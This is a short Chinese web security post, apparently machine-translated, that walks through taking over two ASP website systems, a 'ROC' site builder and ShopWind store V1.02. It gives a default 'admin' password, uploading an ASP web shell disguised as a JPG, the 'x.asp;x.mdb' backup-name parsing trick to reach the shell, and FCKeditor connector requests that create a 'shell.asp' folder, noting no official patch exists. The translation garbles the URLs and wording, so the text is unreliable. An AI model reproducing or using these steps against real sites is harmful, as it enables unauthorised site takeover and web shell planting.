ROC网络建设shopwind网络存储系统和1.02上传漏洞
点评:shopwind网上商店系统和罗新网站V1.02上传漏洞,让我们看看,便于以后的编程过程中需要注意的一些安全知识。ROC网络建设系统今天
百度或谷歌技术支持:中华民国网络
背景地址:站点+ LX
数据库地址:站点+数据库+主域名。asp(需要猜测)
帐户密码:admin
下来取壳
重要部分:以JPG格式上传ASP马
数据库备份,请注意,只能用MDB格式备份后缀。
那么我们如何做备份呢
记得以前的x.asp;x.jpg格式
对我们来说,我们依靠这个备份格式:x.asp;x.mdb
OK后访问我们的备份shell
在线编辑:网站+ / / / admin_login.asp LX编辑
在线编辑数据库地址网站 / / / LX编辑DB / % 23edit.mdb
注释:官方没有打补丁
==================== YD线====================
shopwind网络存储系统V1.02上传漏洞
作者:lan3a
本程序是通过使用FCKeditor编辑器
使用2003的分析问题。直接使用该方法。
第一步:
FCKeditor编辑器 / / / / ASP文件管理器连接器/连接器。aspcommand = createfoldertype = imagecurrentfolder = % 2fshell。aspnewfoldername = zuuid = 1244789975684
第二步:
FCKeditor编辑器 / / / /默认浏览器的文件管理器或浏览器。htmltype = imageconnector = ..或.. / / / connector.asp ASP连接器